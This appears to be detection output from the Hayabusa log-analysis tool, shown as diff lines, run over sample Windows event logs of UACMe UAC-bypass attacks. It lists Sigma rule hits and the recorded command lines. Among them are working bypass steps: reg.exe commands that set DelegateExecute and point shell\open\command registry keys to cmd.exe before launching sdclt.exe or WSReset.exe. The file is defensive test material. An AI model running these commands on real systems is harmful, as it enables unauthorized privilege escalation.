+2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.875 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 747F3D96-88AB-5D46-0000-001081ED7D03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:36.239 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 747F3D96-9DB2-5D46-0000-00106DBDAF03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 747F3D96-9DB4-5D46-0000-0010F825B003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:22.267 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.893 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.060 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 747F3D96-A105-5D46-0000-001071B8BC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:35.454 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:57.800 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 747F3D96-A686-5D46-0000-00108F56D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.714 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 747F3D96-A686-5D46-0000-00100958D703,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:34:00.871 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:34:01.014 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.609 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 747F3D96-B07F-5D46-0000-001050C80F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
